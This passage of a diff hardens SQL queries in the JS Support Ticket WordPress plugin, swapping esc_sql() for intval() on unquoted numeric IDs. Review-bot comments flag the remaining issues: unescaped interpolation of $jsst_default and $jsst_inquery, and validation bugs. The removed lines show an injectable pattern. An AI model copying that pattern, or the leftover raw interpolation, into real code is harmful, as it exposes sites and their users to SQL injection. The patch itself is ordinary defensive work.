-                        $jsst_query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_acl_user_access_departments` WHERE departmentid = " . esc_sql($jsst_id) . ") ";
+                        $jsst_query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_acl_user_access_departments` WHERE departmentid = " . intval($jsst_id) . ") ";
                     }

                     if(in_array('helptopic', jssupportticket::$_active_addons)){
-                        $jsst_query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_help_topics` WHERE departmentid = " . esc_sql($jsst_id) . ") ";
+                        $jsst_query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_help_topics` WHERE departmentid = " . intval($jsst_id) . ") ";
                     }

                     if(in_array('cannedresponses', jssupportticket::$_active_addons)){
-                        $jsst_query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_department_message_premade` WHERE departmentid = " . esc_sql($jsst_id) . ")";
+                        $jsst_query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_department_message_premade` WHERE departmentid = " . intval($jsst_id) . ")";
                     }

                     $jsst_query .= " ) AS total";
@@ -251,7 +251,7 @@
     function changeStatus($jsst_id) {
         if (!is_numeric($jsst_id))
             return false;
-        $jsst_query = "SELECT status  FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id=" . esc_sql($jsst_id);
+        $jsst_query = "SELECT status  FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id=" . intval($jsst_id);
            $jsst_status = jssupportticket::$_db->get_var($jsst_query);
        $jsst_status = 1 - $jsst_status;

@@ -269,10 +269,10 @@
         if (!is_numeric($jsst_id))
             return false;

-        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_departments` SET isdefault = 0 WHERE id != " . esc_sql($jsst_id);
+        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_departments` SET isdefault = 0 WHERE id != " . intval($jsst_id);
         jssupportticket::$_db->query($jsst_query);

-        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_departments` SET isdefault = 1 - $jsst_default WHERE id=" . esc_sql($jsst_id);
+        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_departments` SET isdefault = 1 - $jsst_default WHERE id=" . intval($jsst_id);
         jssupportticket::$_db->query($jsst_query);

         if (jssupportticket::$_db->last_error == null) {
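Review bot: the second UPDATE interpolates `$jsst_default` directly into `SET isdefault = 1 - $jsst_default` with no cast, while the same statement now applies `intval()` to `$jsst_id`. Unless `$jsst_default` is guaranteed to be an integer above the hunk, cast it too: `SET isdefault = 1 - " . intval($jsst_default) . " WHERE id=" . intval($jsst_id)`.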
@@ -298,7 +298,7 @@
             return false;
         }

-        $jsst_query = "SELECT id, topic AS text FROM `" . jssupportticket::$_db->prefix . "js_ticket_help_topics` WHERE status = 1 AND departmentid = " . esc_sql($jsst_departmentid) . " ORDER BY ordering ASC";
+        $jsst_query = "SELECT id, topic AS text FROM `" . jssupportticket::$_db->prefix . "js_ticket_help_topics` WHERE status = 1 AND departmentid = " . intval($jsst_departmentid) . " ORDER BY ordering ASC";
         $jsst_list = jssupportticket::$_db->get_results($jsst_query);

         $jsst_query = "SELECT required FROM `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` WHERE field='helptopic'";
@@ -322,7 +322,7 @@
         $jsst_departmentid = JSSTrequest::getVar('val');
         if (!is_numeric($jsst_departmentid))
             return false;
-        $jsst_query = "SELECT id, title AS text FROM `" . jssupportticket::$_db->prefix . "js_ticket_department_message_premade` WHERE status = 1 AND departmentid = " . esc_sql($jsst_departmentid);
+        $jsst_query = "SELECT id, title AS text FROM `" . jssupportticket::$_db->prefix . "js_ticket_department_message_premade` WHERE status = 1 AND departmentid = " . intval($jsst_departmentid);
         $jsst_query .= " ORDER BY title ASC ";
         $jsst_list = jssupportticket::$_db->get_results($jsst_query);
         $jsst_combobox = false;
@@ -352,7 +352,7 @@
     function getSignatureByID($jsst_id) {
         if (!is_numeric($jsst_id))
             return false;
-        $jsst_query = "SELECT departmentsignature FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . esc_sql($jsst_id);
+        $jsst_query = "SELECT departmentsignature FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . intval($jsst_id);
         $jsst_signature = jssupportticket::$_db->get_var($jsst_query);
         return $jsst_signature;
     }
@@ -360,7 +360,7 @@
     function getDepartmentById($jsst_id) {
         if (!is_numeric($jsst_id))
             return false;
-        $jsst_query = "SELECT departmentname FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . esc_sql($jsst_id);
+        $jsst_query = "SELECT departmentname FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . intval($jsst_id);
         $jsst_departmentname = jssupportticket::$_db->get_var($jsst_query);
         return $jsst_departmentname;
     }
--- a/js-support-ticket/modules/email/model.php
+++ b/js-support-ticket/modules/email/model.php
@@ -110,7 +110,7 @@
                                     FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` AS ticket
                                     LEFT JOIN `".jssupportticket::$_db->prefix."js_ticket_departments` AS dept ON dept.id = ticket.departmentid
                                     LEFT JOIN `".jssupportticket::$_db->prefix."js_ticket_email` AS email ON email.id = dept.emailid
-                                    WHERE ticket.id = ".esc_sql($jsst_id);
+                                    WHERE ticket.id = ".intval($jsst_id);
                         $jsst_dept_result = jssupportticket::$_db->get_row($jsst_query);
                         if($jsst_dept_result){
                             if(isset($jsst_dept_result->sendmail) && $jsst_dept_result->sendmail == 1){
@@ -1880,19 +1880,19 @@
             $jsst_query = "SELECT mail.subject,mail.message,CONCAT(staff.firstname,' ',staff.lastname) AS sendername, staff.uid as staffuid
                         FROM `" . jssupportticket::$_db->prefix . "js_ticket_staff_mail` AS mail
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_staff` AS staff ON staff.id = mail.fromid
-                        WHERE mail.id = " . esc_sql($jsst_id);
+                        WHERE mail.id = " . intval($jsst_id);
         } else {
             $jsst_query = "SELECT mail.subject,reply.message,CONCAT(staff.firstname,' ',staff.lastname) AS sendername, staff.uid as staffuid
                         FROM `" . jssupportticket::$_db->prefix . "js_ticket_staff_mail` AS reply
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_staff_mail` AS mail ON mail.id = reply.replytoid
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_staff` AS staff ON staff.id = reply.fromid
-                        WHERE reply.id = " . esc_sql($jsst_id);
+                        WHERE reply.id = " . intval($jsst_id);
         }
         $jsst_result = jssupportticket::$_db->get_row($jsst_query);
             $jsst_query = "SELECT staff.email
                         FROM `" . jssupportticket::$_db->prefix . "js_ticket_staff_mail` AS mail
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_staff` AS staff ON staff.id = mail.toid
-                        WHERE mail.id = " . esc_sql($jsst_id);
+                        WHERE mail.id = " . intval($jsst_id);
         $jsst_email = jssupportticket::$_db->get_var($jsst_query);
         $jsst_result->receveremail = $jsst_email;
         return $jsst_result;
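Review bot: `$jsst_result->receveremail = $jsst_email;` on the line after `get_var()` writes a property without checking that the earlier `get_row()` returned a row. After this change a non-matching `$jsst_id` (including any non-numeric value, which `intval()` coerces to 0) yields `null`, and assigning a property on `null` is a fatal `Error` on PHP 8. Add `if (!$jsst_result) return false;` before the second query.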
@@ -1903,7 +1903,7 @@
             return false;
         $jsst_query = "SELECT staff.email
                     FROM `" . jssupportticket::$_db->prefix . "js_ticket_staff` AS staff
-                    WHERE staff.id = " . esc_sql($jsst_id);
+                    WHERE staff.id = " . intval($jsst_id);
         $jsst_emailaddress = jssupportticket::$_db->get_var($jsst_query);
         return $jsst_emailaddress;
     }
@@ -1913,7 +1913,7 @@
             return false;
         $jsst_query = "SELECT staff.uid
                     FROM `" . jssupportticket::$_db->prefix . "js_ticket_staff` AS staff
-                    WHERE staff.id = " . esc_sql($jsst_id);
+                    WHERE staff.id = " . intval($jsst_id);
         $jsst_emailaddress = jssupportticket::$_db->get_var($jsst_query);
         return $jsst_emailaddress;
     }
@@ -1921,7 +1921,7 @@
     private function getLatestReplyByTicketId($jsst_id) {
         if (!is_numeric($jsst_id))
             return false;
-        $jsst_query = "SELECT reply.message FROM `" . jssupportticket::$_db->prefix . "js_ticket_replies` AS reply WHERE reply.ticketid = " . esc_sql($jsst_id) . " ORDER BY reply.created DESC LIMIT 1";
+        $jsst_query = "SELECT reply.message FROM `" . jssupportticket::$_db->prefix . "js_ticket_replies` AS reply WHERE reply.ticketid = " . intval($jsst_id) . " ORDER BY reply.created DESC LIMIT 1";
         $jsst_message = jssupportticket::$_db->get_var($jsst_query);
         if (jssupportticket::$_db->last_error != null) {
             JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -2013,7 +2013,7 @@
                         FROM `" . jssupportticket::$_db->prefix . "js_ticket_tickets` AS ticket
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_departments` AS department ON department.id = ticket.departmentid
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_email` AS email ON email.id = department.emailid
-                        WHERE ticket.id = " . esc_sql($jsst_id);
+                        WHERE ticket.id = " . intval($jsst_id);
             $jsst_email = jssupportticket::$_db->get_row($jsst_query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -2030,7 +2030,7 @@
     private function getDefaultSenderEmailAndName() {
         $jsst_emailid = jssupportticket::$_config['default_alert_email'];
         if(!is_numeric($jsst_emailid)) return false;
-        $jsst_query = "SELECT email,name FROM `" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE id = " . esc_sql($jsst_emailid);
+        $jsst_query = "SELECT email,name FROM `" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE id = " . intval($jsst_emailid);
         $jsst_email = jssupportticket::$_db->get_row($jsst_query);
         return $jsst_email;
     }
@@ -2040,7 +2040,7 @@

         // If multiformid is provided
         if (!empty($jsst_multiformid)) {
-            $jsst_query .= " AND multiformid = " . esc_sql($jsst_multiformid);
+            $jsst_query .= " AND multiformid = " . intval($jsst_multiformid);
             $jsst_template = jssupportticket::$_db->get_row($jsst_query);

             // If no form-specific template is found, fallback to default
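Review bot: `!empty($jsst_multiformid)` followed by `intval()` means a non-numeric value becomes `multiformid = 0` and quietly drops into the default-template fallback instead of being rejected; add the `is_numeric()` check the neighbouring functions in this file use, or switch to `prepare()` with `%d` so the type is enforced in one place.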
@@ -2075,7 +2075,7 @@
                     . " LEFT JOIN `" . jssupportticket::$_db->prefix . "js_ticket_departments` AS department ON department.id = ticket.departmentid "
                     . jssupportticket::$_addon_query['join']
                     . " LEFT JOIN `" . jssupportticket::$_db->prefix . "js_ticket_priorities` AS priority ON priority.id = ticket.priorityid "
-                    . " WHERE ticket.id = " . esc_sql($jsst_id);
+                    . " WHERE ticket.id = " . intval($jsst_id);
                 do_action('jsst_reset_aadon_query');
             break;
             default:
--- a/js-support-ticket/modules/emailtemplate/model.php
+++ b/js-support-ticket/modules/emailtemplate/model.php
@@ -70,7 +70,7 @@
             $jsst_query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_emailtemplates` WHERE templatefor = '" . esc_sql($jsst_tempatefor) . "'";
         }
         if (!empty($jsst_formid)) {
-            $jsst_query .= " AND multiformid = " . esc_sql($jsst_formid);
+            $jsst_query .= " AND multiformid = " . intval($jsst_formid);
         } else {
             $jsst_query .= " AND (multiformid IS NULL OR multiformid = '')";
         }
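Review bot: same `!empty` then `intval()` pattern: a non-numeric `$jsst_formid` now becomes `multiformid = 0`, which matches neither the `IS NULL` nor the `= ''` rows selected by the `else` branch, so the lookup returns no template rather than falling back to the default. Validate with `is_numeric()` before the branch so bad input takes the fallback path deliberately.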
--- a/js-support-ticket/modules/fieldordering/model.php
+++ b/js-support-ticket/modules/fieldordering/model.php
@@ -26,7 +26,7 @@

         // Data
 //        $jsst_query = "SELECT * FROM `".jssupportticket::$_db->prefix."js_ticket_fieldsordering` WHERE published = 1 AND fieldfor = 1 ORDER BY ordering LIMIT ".JSSTpagination::getOffset().", ".JSSTpagination::getLimit();
-        $jsst_query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` WHERE fieldfor = ".esc_sql($jsst_fieldfor);
+        $jsst_query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` WHERE fieldfor = ".intval($jsst_fieldfor);
         $jsst_query .= $jsst_inquery." ORDER BY ordering ";

         jssupportticket::$jsst_data[0] = jssupportticket::$_db->get_results($jsst_query);
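Review bot: `$jsst_query .= $jsst_inquery." ORDER BY ordering ";` concatenates a fragment whose construction is outside this hunk, and it is not escaped at this point; the `intval()` on `fieldfor` is right but does not cover that fragment, so please confirm `$jsst_inquery` is built only from validated values.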
@@ -40,14 +40,14 @@
         if (!is_numeric($jsst_id))
             return false;
         if ($jsst_status == 'publish') {
-            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET published = 1 WHERE id = " . esc_sql($jsst_id) . " AND cannotunpublish = 0";
+            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET published = 1 WHERE id = " . intval($jsst_id) . " AND cannotunpublish = 0";
             jssupportticket::$_db->query($jsst_query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError();
             }
             JSSTmessage::setMessage(esc_html(__('Field mark as published', 'js-support-ticket')),'updated');
         } elseif ($jsst_status == 'unpublish') {
-            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET published = 0 WHERE id = " . esc_sql($jsst_id) . " AND cannotunpublish = 0";
+            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET published = 0 WHERE id = " . intval($jsst_id) . " AND cannotunpublish = 0";
             jssupportticket::$_db->query($jsst_query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -61,12 +61,12 @@
         if (!is_numeric($jsst_id))
             return false;
         if ($jsst_status == 'publish') {
-            $jsst_query = "SELECT adminonly FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE id = " . esc_sql($jsst_id);
+            $jsst_query = "SELECT adminonly FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE id = " . intval($jsst_id);
             $jsst_adminonly = jssupportticket::$_db->get_var($jsst_query);
             if(!empty($jsst_adminonly)){
                 JSSTmessage::setMessage(esc_html(__('Field cannot be mark as published', 'js-support-ticket')),'error');
             }else{
-                $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET isvisitorpublished = 1 WHERE id = " . esc_sql($jsst_id) . " AND cannotunpublish = 0";
+                $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET isvisitorpublished = 1 WHERE id = " . intval($jsst_id) . " AND cannotunpublish = 0";
                 jssupportticket::$_db->query($jsst_query);
                 if (jssupportticket::$_db->last_error != null) {
                     JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -74,7 +74,7 @@
                 JSSTmessage::setMessage(esc_html(__('Field mark as published', 'js-support-ticket')),'updated');
             }
         } elseif ($jsst_status == 'unpublish') {
-            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET isvisitorpublished = 0 WHERE id = " . esc_sql($jsst_id) . " AND cannotunpublish = 0";
+            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET isvisitorpublished = 0 WHERE id = " . intval($jsst_id) . " AND cannotunpublish = 0";
             jssupportticket::$_db->query($jsst_query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -88,23 +88,23 @@
         if (!is_numeric($jsst_id))
             return false;

-        // $jsst_query = "SELECT field FROM `".jssupportticket::$_db->prefix."js_ticket_fieldsordering` WHERE id =".esc_sql($jsst_id);
+        // $jsst_query = "SELECT field FROM `".jssupportticket::$_db->prefix."js_ticket_fieldsordering` WHERE id =".intval($jsst_id);
         // $jsst_child = jssupportticket::$_db->get_var($jsst_query);
-        // $jsst_query = "SELECT count(id) FROM `".jssupportticket::$_db->prefix."js_ticket_fieldsordering` WHERE visible_field = '".esc_sql($jsst_child)."'";
+        // $jsst_query = "SELECT count(id) FROM `".jssupportticket::$_db->prefix."js_ticket_fieldsordering` WHERE visible_field = '".intval($jsst_child)."'";
         // $jsst_count = jssupportticket::$_db->get_var($jsst_query);
         // if ($jsst_count > 0) {
         //     JSSTmessage::setMessage(esc_html(__('Field cannot mark as required', 'js-support-ticket')), 'error');
         //     return;
         // }
         if ($jsst_status == 'required') {
-            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET required = 1 WHERE id = " . esc_sql($jsst_id) . " AND cannotunpublish = 0";
+            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET required = 1 WHERE id = " . intval($jsst_id) . " AND cannotunpublish = 0";
             jssupportticket::$_db->query($jsst_query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError();
             }
             JSSTmessage::setMessage(esc_html(__('Field mark as required', 'js-support-ticket')),'updated');
         } elseif ($jsst_status == 'unrequired') {
-            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET required = 0 WHERE id = " . esc_sql($jsst_id) . " AND cannotunpublish = 0";
+            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET required = 0 WHERE id = " . intval($jsst_id) . " AND cannotunpublish = 0";
             jssupportticket::$_db->query($jsst_query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError();
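Review bot: the two edited lines at the top of this hunk are commented-out code, and the second now wraps `$jsst_child` (the `field` value selected by the line above it, a string) in `intval()` inside single quotes, which would be wrong if the block were ever revived. Either delete the dead block or leave it untouched rather than carry a broken edit in a comment.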
@@ -120,16 +120,16 @@
         if ($jsst_action == 'down') {
             $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` AS f1, `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` AS f2
                         SET f1.ordering = f1.ordering - 1 WHERE f1.ordering = f2.ordering + 1 AND f1.fieldfor = f2.fieldfor
-                        AND f2.id = " . esc_sql($jsst_id);
+                        AND f2.id = " . intval($jsst_id);
             jssupportticket::$_db->query($jsst_query);
-            $jsst_query = " UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET ordering = ordering + 1 WHERE id = " . esc_sql($jsst_id);
+            $jsst_query = " UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET ordering = ordering + 1 WHERE id = " . intval($jsst_id);
             jssupportticket::$_db->query($jsst_query);
             JSSTmessage::setMessage(esc_html(__('Field ordering down', 'js-support-ticket')),'updated');
         } elseif ($jsst_action == 'up') {
             $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` AS f1, `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` AS f2 SET f1.ordering = f1.ordering + 1
-                        WHERE f1.ordering = f2.ordering - 1 AND f1.fieldfor = f2.fieldfor AND f2.id = " . esc_sql($jsst_id);
+                        WHERE f1.ordering = f2.ordering - 1 AND f1.fieldfor = f2.fieldfor AND f2.id = " . intval($jsst_id);
             jssupportticket::$_db->query($jsst_query);
-            $jsst_query = " UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET ordering = ordering - 1 WHERE id = " . esc_sql($jsst_id);
+            $jsst_query = " UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET ordering = ordering - 1 WHERE id = " . intval($jsst_id);
             jssupportticket::$_db->query($jsst_query);
             JSSTmessage::setMessage(esc_html(__('Field ordering up', 'js-support-ticket')),'updated');
         }
@@ -160,7 +160,7 @@
                 $jsst_adminonly = ' AND adminonly != 1 ';
             }
         }
-        $jsst_query = "SELECT  * FROM `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` WHERE ".$jsst_published." AND fieldfor =  " . esc_sql($jsst_fieldfor);
+        $jsst_query = "SELECT  * FROM `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` WHERE ".$jsst_published." AND fieldfor =  " . intval($jsst_fieldfor);
         if ($jsst_fieldfor == 1) {
             $jsst_query .= " AND multiformid =  " . intval($jsst_formid);
         }
@@ -195,7 +195,7 @@
         if ($jsst_data['isuserfield'] == 1) {
             // value to add as field ordering
             if ($jsst_data['id'] == '') { // only for new
-                $jsst_query = "SELECT max(ordering) FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE fieldfor=".esc_sql($jsst_data['fieldfor']);
+                $jsst_query = "SELECT max(ordering) FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE fieldfor=".intval($jsst_data['fieldfor']);
                 $jsst_var = jssupportticket::$_db->get_var($jsst_query);
                 $jsst_data['ordering'] = $jsst_var + 1;
                 if(isset($jsst_data['userfieldtype']) && ($jsst_data['userfieldtype'] == 'file' || $jsst_data['userfieldtype'] == 'termsandconditions' ) ){
@@ -271,7 +271,7 @@
                 // new start

                 if (!empty($jsst_data['id'])) {
-                    $jsst_query = "SELECT id, visible_field FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE visible_field LIKE '%" . esc_sql($jsst_fieldname) . "%' AND multiformid = ".esc_sql($jsst_data['multiformid']);
+                    $jsst_query = "SELECT id, visible_field FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE visible_field LIKE '%" . esc_sql($jsst_fieldname) . "%' AND multiformid = ".intval($jsst_data['multiformid']);
                     $jsst_query_results = jssupportticket::$_db->get_results($jsst_query);

                     if (!empty($jsst_query_results)) {
@@ -279,7 +279,7 @@
                             $jsst_query_fieldname = $jsst_query_result->visible_field;
                             $jsst_query_fieldname = jssupportticketphplib::JSST_str_replace(',' . $jsst_fieldname, '', $jsst_query_fieldname);
                             $jsst_query_fieldname = jssupportticketphplib::JSST_str_replace($jsst_fieldname, '', $jsst_query_fieldname);
-                            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET visible_field = '" . esc_sql($jsst_query_fieldname) . "' WHERE id = " . esc_sql($jsst_query_result->id) . " AND multiformid = ".esc_sql($jsst_data['multiformid']);
+                            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET visible_field = '" . esc_sql($jsst_query_fieldname) . "' WHERE id = " . esc_sql($jsst_query_result->id) . " AND multiformid = ".intval($jsst_data['multiformid']);
                             jssupportticket::$_db->query($jsst_query);
                         }
                     }
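Review bot: the `UPDATE` in this hunk still uses `esc_sql($jsst_query_result->id)` for the `id` comparison while `multiformid` on the same line was switched to `intval()`. The value comes from the database rather than the request, so the risk is low, but `esc_sql()` on an unquoted number does nothing useful; make it `intval($jsst_query_result->id)` for consistency.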
@@ -325,7 +325,7 @@
                         }

                         // --- your database update code ---
-                        $jsst_query = "SELECT visible_field FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE field = '" . esc_sql($jsst_visibleParents[$jsst_index]) . "' AND multiformid = ".esc_sql($jsst_data['multiformid']);
+                        $jsst_query = "SELECT visible_field FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE field = '" . esc_sql($jsst_visibleParents[$jsst_index]) . "' AND multiformid = ".intval($jsst_data['multiformid']);
                         $jsst_old_fieldname = jssupportticket::$_db->get_var($jsst_query);
                         $jsst_new_fieldname = $jsst_fieldname;

@@ -338,7 +338,7 @@
                             $jsst_new_fieldname = $jsst_old_fieldname . ',' . $jsst_new_fieldname;
                         }

-                        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET visible_field = '" . esc_sql($jsst_new_fieldname) . "' WHERE field = '" . esc_sql($jsst_visibleParents[$jsst_index]) . "' AND multiformid = ".esc_sql($jsst_data['multiformid']);
+                        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET visible_field = '" . esc_sql($jsst_new_fieldname) . "' WHERE field = '" . esc_sql($jsst_visibleParents[$jsst_index]) . "' AND multiformid = ".intval($jsst_data['multiformid']);
                         jssupportticket::$_db->query($jsst_query);

                         if (jssupportticket::$_db->last_error != null) {
@@ -359,7 +359,7 @@
                 if ($jsst_data['fieldfor'] != 3) {
                     $jsst_data['visibleparams'] = '';
                     // If editing old field
-                    $jsst_query = "SELECT id, visible_field FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE visible_field LIKE '%" . esc_sql($jsst_fieldname) . "%' AND multiformid = ".esc_sql($jsst_data['multiformid']);
+                    $jsst_query = "SELECT id, visible_field FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE visible_field LIKE '%" . esc_sql($jsst_fieldname) . "%' AND multiformid = ".intval($jsst_data['multiformid']);
                     $jsst_query_results = jssupportticket::$_db->get_results($jsst_query);
                     if (!empty($jsst_query_results)) {
                         foreach ($jsst_query_results as $jsst_query_result) {
@@ -466,7 +466,7 @@

                 /* get parent saved data */
                 $jsst_query = "SELECT * FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering where
-                id = '". esc_sql($jsst_data['id'])."'";
+                id = '". intval($jsst_data['id'])."'";
                 $jsst_parent = jssupportticket::$_db->get_row($jsst_query);
                 /* get parent saved data */

@@ -494,11 +494,11 @@
             $jsst_clasue = ' , ';
         }
         if(isset($jsst_data['published']) && $jsst_data['published'] != null){
-            $jsst_inquery .= $jsst_clasue." published = ". esc_sql($jsst_data['published']);
+            $jsst_inquery .= $jsst_clasue." published = ". intval($jsst_data['published']);
             $jsst_clasue = ' , ';
         }
         if(isset($jsst_data['isvisitorpublished']) && $jsst_data['isvisitorpublished'] != null){
-            $jsst_inquery .= $jsst_clasue." isvisitorpublished = ". esc_sql($jsst_data['isvisitorpublished']);
+            $jsst_inquery .= $jsst_clasue." isvisitorpublished = ". intval($jsst_data['isvisitorpublished']);
             $jsst_clasue = ' , ';
         }
         if(isset($jsst_data['placeholder']) && $jsst_data['placeholder'] != null){
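Review bot: the `!= null` loose comparisons guarding `published` and `isvisitorpublished` treat integer `0` as equal to `null`, so a request that sets either flag to `0` is skipped and the flag can never be cleared through this update. Compare with `!== ''` or `isset()` instead; `intval()` is the right conversion for these flag columns once the guard is fixed.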
@@ -510,27 +510,27 @@
             $jsst_clasue = ' , ';
         }
         if(isset($jsst_data['required']) && $jsst_data['required'] != null){
-            $jsst_inquery .= $jsst_clasue." required = ". esc_sql($jsst_data['required']);
+            $jsst_inquery .= $jsst_clasue." required = ". intval($jsst_data['required']);
             $jsst_clasue = ' , ';
         }
         if(isset($jsst_data['search_user']) && $jsst_data['search_user'] != null){
-            $jsst_inquery .= $jsst_clasue." search_user = ". esc_sql($jsst_data['search_user']);
+            $jsst_inquery .= $jsst_clasue." search_user = ". intval($jsst_data['search_user']);
             $jsst_clasue = ' , ';
         }
         if(isset($jsst_data['search_admin']) && $jsst_data['search_admin'] != null){
-            $jsst_inquery .= $jsst_clasue." search_admin = ". esc_sql($jsst_data['search_admin']);
+            $jsst_inquery .= $jsst_clasue." search_admin = ". intval($jsst_data['search_admin']);
             $jsst_clasue = ' , ';
         }
         if(isset($jsst_data['search_visitor']) && $jsst_data['search_visitor'] != null){
-            $jsst_inquery .= $jsst_clasue." search_visitor = ". esc_sql($jsst_data['search_visitor']);
+            $jsst_inquery .= $jsst_clasue." search_visitor = ". intval($jsst_data['search_visitor']);
             $jsst_clasue = ' , ';
         }
         if(isset($jsst_data['showonlisting']) && $jsst_data['showonlisting'] != null){
-            $jsst_inquery .= $jsst_clasue." showonlisting = ". esc_sql($jsst_data['showonlisting']);
+            $jsst_inquery .= $jsst_clasue." showonlisting = ". intval($jsst_data['showonlisting']);
             $jsst_clasue = ' , ';
         }

-        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET ".$jsst_inquery." WHERE id = " . esc_sql($jsst_data['id']) ;
+        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET ".$jsst_inquery." WHERE id = " . intval($jsst_data['id']) ;
         jssupportticket::$_db->query($jsst_query);
         if (jssupportticket::$_db->last_error != null) {
             JSSTincluder::getJSModel('systemerror')->addSystemError();
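Review bot: the final `UPDATE` builds `SET " . $jsst_inquery . " WHERE id = ...` with no visible check that `$jsst_inquery` is non-empty; combined with the `!= null` guards above, which skip zero-valued flags, a request that only clears flags produces `SET  WHERE id = N`, a syntax error that surfaces through `addSystemError()` rather than as a validation failure. Return early when nothing was appended.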
@@ -545,7 +545,7 @@
         if(!is_numeric($jsst_parentfield)) return false;
         if(empty($jsst_field)) return false;

-        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET depandant_field = '" . esc_sql($jsst_field) . "' WHERE id = " . esc_sql($jsst_parentfield)." AND fieldfor = ".esc_sql($jsst_fieldfor);
+        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET depandant_field = '" . esc_sql($jsst_field) . "' WHERE id = " . intval($jsst_parentfield)." AND fieldfor = ".intval($jsst_fieldfor);
         jssupportticket::$_db->query($jsst_query);
         if (jssupportticket::$_db->last_error != null) {
